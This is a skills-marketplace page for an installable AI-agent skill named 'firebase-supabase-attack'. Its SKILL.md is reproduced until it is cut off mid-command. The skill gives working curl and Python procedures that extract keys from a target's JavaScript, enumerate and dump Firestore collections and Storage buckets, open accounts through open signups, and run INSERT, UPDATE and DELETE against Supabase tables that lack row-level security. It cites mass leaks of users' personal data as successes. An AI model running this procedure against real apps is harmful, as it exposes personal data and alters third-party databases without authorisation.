SkillAgentSearch skills...

firebase-supabase-attack

Exploit Firebase/Supabase for data via JS config leak probe.

Install / Use

npx skills add uphiago/recon-skills --skill firebase-supabase-attack

Installs into whichever agent you are using.

About this skill
📄

SKILL.md

Installable skill definition

Quality Score

90/100

Category

Security

Supported Platforms

Universal

Our assessment of firebase-supabase-attack

firebase-supabase-attack scores 90/100 on our quality scale, 458th of 971 Security skills we index (top 48%).

Its SKILL.md is 14 KB long, well organised into 34 sections with 9 code examples: a thorough specification that gives an agent plenty to work with.

With 1,280 GitHub stars, it is one of the more widely adopted skills in the catalogue.

Substance
30/30
Structure
20/20
Description
12/15
Adoption
13/20
Freshness
15/15

Maintenance, license and trust

  • The repository was last updated 29 days ago, so firebase-supabase-attack is actively maintained.
  • It is released under the MIT license, a permissive license that allows use, modification and commercial use with attribution.
  • Its trust signals score 100/100, with no cautions. These come from repository metadata, not a code audit — read the skill file before letting an agent act on it.

firebase-supabase-attack compared with similar skills

All 4 of these similar skills score higher than firebase-supabase-attack; compare them before choosing.

SkillScoreStarsUpdatedFormat
firebase-supabase-attack (this skill)by uphiago901.3k29d agoSKILL.md
Agent-Reachby Panniantong10086.6k15d agoCLAUDE.md
headroomby headroomlabs-ai10074.2ktodayCLAUDE.md
Scraplingby D4Vinci10084.8ktodayMCP Server
crawl4aiby unclecode10084.6k6d agoMCP Server

Frequently asked questions

How do I install firebase-supabase-attack?
Run npx skills add uphiago/recon-skills --skill firebase-supabase-attack. The install tabs above show the steps for each supported agent.
Which AI agents does firebase-supabase-attack work with?
It is written for Universal, as a SKILL.md file. Other agents that read the same format can often use it too.
Is firebase-supabase-attack safe to use?
It is MIT-licensed and scores 100/100 on trust signals. Skills are instructions an agent will follow, so read the file before installing it and do not approve commands you do not understand.
Is firebase-supabase-attack still maintained?
The repository was last updated 29 days ago, so firebase-supabase-attack is actively maintained.

name: firebase-supabase-attack description: Exploit Firebase/Supabase for data via JS config leak probe. version: 1.1.0 revision_date: 2026-07-25 license: MIT platforms: [linux] compatibility: Requires curl, nmap, python3, masscan, subfinder, httpx, nuclei tags: [recon, firebase, supabase, firestore, cloud, data-breach] category: recon related_skills:

  • api-noauth-hunt
  • js-secrets-extraction
  • source-leak-hunt

Firebase & Supabase Attack Skill

Exploit misconfigured Firebase (Firestore, Storage, Auth) and Supabase (REST API, Storage, Auth) backends. These BaaS platforms are the #1 source of massive data breaches in modern web apps when Row Level Security (RLS) is missing and API keys leak in JavaScript bundles. Confirmed on delivery-platform (204K WhatsApp conversations, 173K phone numbers), visa-processing-platform (64K users, 46K reports), fitness-chain (39K users, 5 Firebase projects, 21 credentials), dental-booking (9 clinics, 1,749 leads).

When to Use

  • JavaScript bundle analysis reveals Firebase config (apiKey, projectId) or Supabase URL + anon key.
  • Target uses a modern SPA (React, Vue, Angular) with BaaS backend.
  • After js-secrets-extraction finds Firebase/Supabase identifiers.
  • After source-leak-hunt finds .env with FIREBASE_* or SUPABASE_* variables.

Prerequisites

  • terminal with curl, python3, jq.
  • Firebase project ID or Supabase URL + anon key (from JS bundle, source leak, or recon).
  • For Firebase SA key exploitation: python3 with google-auth library.

How to Run

# Firebase Firestore — list collections (if public)
curl --max-time 30 --connect-timeout 10 -sk "https://firestore.googleapis.com/v1/projects/PROJECT_ID/databases/(default)/documents/"

# Supabase — list users table (if RLS missing)
curl --max-time 30 --connect-timeout 10 -sk "https://PROJECT.supabase.co/rest/v1/users" \
  -H "apikey: ANON_KEY" -H "Authorization: Bearer ANON_KEY"

# Supabase — test signup (if open)
curl --max-time 30 --connect-timeout 10 -sk -X POST "https://PROJECT.supabase.co/auth/v1/signup" \
  -H "apikey: ANON_KEY" -H "Content-Type: application/json" \
  -d '{"email":"test@evil.com","password":"Test123!"}'

Quick Reference

| Platform | What to Find | Exploit Path | Real Example | |----------|-------------|-------------|--------------| | Firebase Firestore | Public database rules | Direct REST API access, list all collections | delivery-platform: 204K conversations public | | Firebase Storage | Public bucket rules | Download all files via REST API | delivery-platform: 1,000+ WhatsApp audio files public | | Firebase Auth | Open signup | Create accounts, access protected resources | fitness-chain: Firebase Auth signup open | | Firebase SA Key | Service account JSON | GCP IAM escalation, access all GCP resources | fitness-chain: 5 SA keys → full GCP access | | Supabase REST | Missing RLS | SELECT/INSERT/UPDATE/DELETE on any table | visa-processing-platform: 64K users, 46K reports, DELETE confirmed | | Supabase Storage | Public buckets | Download all files, upload malicious content | visa-processing-platform: public PDF reports bucket | | Supabase Auth | Open signup | Create accounts, bypass access controls | dental-booking: open signup + auto-confirm |

Procedure

Phase 1 — Extract Configuration from JS Bundles

TARGET="$1"
OUTDIR="$OUTDIR/firebase_supabase/$TARGET"
mkdir -p "$OUTDIR"

# Download homepage and common JS entry points
curl --max-time 30 --connect-timeout 10 -sk "https://$TARGET/" -o "$OUTDIR/index.html"
curl --max-time 30 --connect-timeout 10 -sk "https://$TARGET/app.js" -o "$OUTDIR/app.js" 2>/dev/null
curl --max-time 30 --connect-timeout 10 -sk "https://$TARGET/main.js" -o "$OUTDIR/main.js" 2>/dev/null

echo "[*] Extracting Firebase/Supabase configs..."

# Firebase config pattern
grep -Eo 'apiKey["\s:]+["][^"]+["]|projectId["\s:]+["][^"]+["]|firebase\.initializeApp' \
  "$OUTDIR"/*.html "$OUTDIR"/*.js 2>/dev/null | sort -u

# Supabase config pattern
grep -Eo 'supabase\.co[^"'\'' ]+|supabaseUrl["\s:]+["][^"]+["]|supabaseKey["\s:]+["][^"]+["]|anon[_-]?key["\s:=]+["][^"]{20,}["]' \
  "$OUTDIR"/*.html "$OUTDIR"/*.js 2>/dev/null | sort -u

Phase 2 — Firebase Firestore Exploitation

PROJECT_ID="$1"  # e.g., delivery-bot-platform

echo "[*] Firestore enumeration for $PROJECT_ID"

# List root collections (if public)
curl --max-time 30 --connect-timeout 10 -sk "https://firestore.googleapis.com/v1/projects/$PROJECT_ID/databases/(default)/documents/" | \
  python3 -c "
import sys, json
try:
    data = json.load(sys.stdin)
    if 'documents' in data:
        print(f'ERROR: {len(data[\"documents\"])} root docs — not a collection list')
    else:
        for k in data.keys():
            print(f'Collection: {k}')
except Exception as e:
    print(f'Error: {e}')
    print(sys.stdin.read()[:500])
" 2>/dev/null

# If Firestore requires auth, try with Firebase ID token from Auth
# (see Phase 4 for token generation via signup)

Phase 3 — Firestore Collection & Document Access

PROJECT_ID="$1"
COLLECTION="$2"  # e.g., conversationsV3, users, stores

echo "[*] Accessing collection: $COLLECTION"

# List documents in collection
curl --max-time 30 --connect-timeout 10 -sk "https://firestore.googleapis.com/v1/projects/$PROJECT_ID/databases/(default)/documents/$COLLECTION" | \
  python3 -c "
import sys, json
data = json.load(sys.stdin)
if 'documents' in data:
    print(f'Documents found: {len(data[\"documents\"])}')
    for doc in data['documents'][:5]:
        name = doc['name'].split('/')[-1]
        fields = doc.get('fields', {})
        # Extract top-level fields
        keys = list(fields.keys())[:10]
        print(f'  {name}: {keys}')
    if len(data['documents']) > 5:
        print(f'  ... and {len(data[\"documents\"]) - 5} more')
elif 'error' in data:
    print(f'Error: {data[\"error\"][\"message\"]}')
" 2>/dev/null

# Read a specific document
DOC_ID="$3"  # from the listing above
curl --max-time 30 --connect-timeout 10 -sk "https://firestore.googleapis.com/v1/projects/$PROJECT_ID/databases/(default)/documents/$COLLECTION/$DOC_ID" | \
  python3 -m json.tool 2>/dev/null | head -50

Phase 4 — Firebase Auth Signup & Token Generation

API_KEY="$1"  # from JS bundle (web API key)
PROJECT_ID="$2"

echo "[*] Testing Firebase Auth signup on $PROJECT_ID"

# Sign up
SIGNUP_RESP=$(curl --max-time 30 --connect-timeout 10 -sk -X POST "https://identitytoolkit.googleapis.com/v1/accounts:signUp?key=$API_KEY" \
  -H "Content-Type: application/json" \
  -d '{"email":"test-'$(date +%s)'@evil.com","password":"TestPass123!","returnSecureToken":true}')

if echo "$SIGNUP_RESP" | grep -q "idToken"; then
  echo "[+] SIGNUP OPEN — account created!"
  ID_TOKEN=$(echo "$SIGNUP_RESP" | python3 -c "import sys,json; print(json.load(sys.stdin)['idToken'])" 2>/dev/null)
  echo "  ID Token: ${ID_TOKEN:0:50}..."

  # Now use this token with Firestore
  echo "[*] Testing Firestore access with ID token..."
  curl --max-time 30 --connect-timeout 10 -sk "https://firestore.googleapis.com/v1/projects/$PROJECT_ID/databases/(default)/documents/" \
    -H "Authorization: Bearer $ID_TOKEN" | python3 -c "
import sys, json
data = json.load(sys.stdin)
if 'documents' in data:
    print(f'[+] ACCESS GRANTED — {len(data[\"documents\"])} collections visible')
elif 'error' in data:
    print(f'[-] Access denied: {data[\"error\"][\"message\"]}')
else:
    print(f'[?] Unknown response: {list(data.keys())}')
" 2>/dev/null
else
  echo "[-] Signup blocked: $(echo "$SIGNUP_RESP" | python3 -c "import sys,json; print(json.load(sys.stdin).get('error',{}).get('message','unknown'))" 2>/dev/null)"
fi

Phase 5 — Firebase Storage Enumeration

PROJECT_ID="$1"
BUCKET="${PROJECT_ID}.appspot.com"  # default bucket name

echo "[*] Storage enumeration for $BUCKET"

# List objects (if public)
curl --max-time 30 --connect-timeout 10 -sk "https://storage.googleapis.com/storage/v1/b/$BUCKET/o" | \
  python3 -c "
import sys, json
data = json.load(sys.stdin)
if 'items' in data:
    total = len(data['items'])
    total_size = sum(int(i.get('size', 0)) for i in data['items'])
    print(f'Objects: {total} ({total_size:,} bytes)')
    for item in data['items'][:5]:
        print(f'  {item[\"name\"]} ({item.get(\"size\",0):,} bytes)')
elif 'error' in data:
    print(f'Error: {data[\"error\"][\"message\"]}')
"

# Download a specific file
OBJECT_NAME="$2"  # from listing
curl --max-time 30 --connect-timeout 10 -sk "https://storage.googleapis.com/storage/v1/b/$BUCKET/o/$OBJECT_NAME?alt=media" \
  -o "/tmp/firebase_$OBJECT_NAME"
echo "[+] Downloaded to /tmp/firebase_$OBJECT_NAME"

Phase 6 — Supabase REST API Exploitation

SUPABASE_URL="$1"  # e.g., https://gfgmuezavgzjmaxhflsu.supabase.co
ANON_KEY="$2"       # from JS bundle

echo "[*] Supabase REST API enumeration"

# Schema discovery — list tables by querying common names
TABLES=("users" "profiles" "organizations" "posts" "comments" "purchases"
        "orders" "products" "reports" "relatorios" "documents" "files"
        "messages" "conversations" "sessions" "audit_logs")

for table in "${TABLES[@]}"; do
  code=$(curl -sk -o /dev/null -w "%{http_code}" --max-time 5 --connect-timeout 5 \
    "$SUPABASE_URL/rest/v1/$table?limit=1" \
    -H "apikey: $ANON_KEY" -H "Authorization: Bearer $ANON_KEY" 2>/dev/null)

  if [[ "$code" == "200" ]]; then
    count=$(curl --max-time 30 --connect-timeout 10 -sk "$SUPABASE_URL/rest/v1/$table?limit=0" \
      -H "apikey: $ANON_KEY" -H "Authorization: Bearer $ANON_KEY" \
      -H "Prefer: count=exact" -I 2>/dev/null | grep -i "content-range" | grep -Eo '\d+(?=/\d+$)')
    echo "  [TABLE] $table — HTTP 200 (${count:-?} rows)"

    # Fetch first 3 rows
    curl --max-time 30 --connect-timeout 10 -sk "$SUPABASE_URL/rest/v1/$table?limit=3" \
      -H "apikey: $ANON_KEY" -H "Authorization: Bearer $ANON_KEY" | \
      python3 -m json.tool 2>/dev/null | head -20
    echo ""
  elif [[ "$code" == "401" || "$code" == "403" ]]; then
    echo "  [BLOCKED] $table — HTTP $code (RLS protected)"
  fi
done

Phase 7 — Supabase CRUD Testing (RLS Bypass)

SUPABASE_URL="$1"
ANON_KEY="$2"
TABLE="$3"  # from table discovery above

echo "[*] CRUD testing on $TABLE"

# INSERT
echo -n "  INSERT: "
curl --max-time 30 --connect-timeout 10 -sk -X POST "$SUPABASE_URL/rest/v1/$TABLE" \
  -H "apikey: $ANON_KEY" -H "Authorization: Bearer $ANON_KEY" \
  -H "Content-Type: application/json" -H "Prefer: return=minimal" \
  -d '{"test":"rls_bypass_probe_'$(date +%s)'"}' \
  -o /dev/null -w "%{http_code}" 2>/dev/null
echo ""

# UPDATE (PATCH)
echo -n "  UPDATE: "
curl --max-time 30 --connect-timeout 10 -sk -X PATCH "$SUPABASE_URL/rest/v1/$TABLE?test=eq.RLS_BYPASS" \
  -H "apikey: $ANON_KEY" -H "Authorization: Bearer $ANON_KEY" \
  -H "Content-Type: application/json" -H "Prefer: return=minimal" \
  -d '{"test":"rls_updated"}' \
  -o /dev/null -w "%{http_code}" 2>/dev/null
echo ""

# DELETE
echo -n "  DELETE: "
curl --max-time 30 --connect-timeout 10 -sk -X DELETE "$SUPABASE_URL/rest/v1/$TABLE?test=eq.RLS_BYPASS" \
  -H "apikey: $ANON_KEY" -H "Authorization: Bearer $ANON_KEY" \
  -H "Prefer: return=minimal" \
  -o /dev/null -w "%{http_code}" 2>/dev/null
echo ""

Phase 8 — Supabase Auth Signup

SUPABASE_URL="$1"
ANON_KEY="$2"

echo "[*] Supabase Auth signup test"

SIGNUP_RESP=$(curl --max-time 30 --connect-timeout 10 -sk -X POST "$SUPABASE_URL/auth/v1/signup" \
  -H "apikey: $ANON_KEY" -H "Content-Type: application/json" \
  -d '{"email":"test-'$(date +%s)'@evil.com","password":"TestPass123!"}')

if echo "$SIGNUP_RESP" | grep -q "access_token"; then
  echo "[+] SIGNUP OPEN!"
  ACCESS_TOKEN=$(echo "$SIGNUP_RESP" | python3 -c "import sys,json; print(json.load(sys.stdin)['access_token'])" 2>/dev/null)
  echo "  Access Token: ${ACCESS_TOKEN:0:50}..."

  # Test cross-org access (change organization_id in profile)
  curl --max-time 30 --con

Truncated for display — read the full file on GitHub.

Related Skills

View on GitHub
GitHub Stars1.3k
CategorySecurity
Updated29d ago
Forks215

Languages

Python

Trust signals

100/100

From repository metadata: license, adoption, age and documentation. Not a code audit — see the Safety scan above for what the skill file itself contains.

No cautions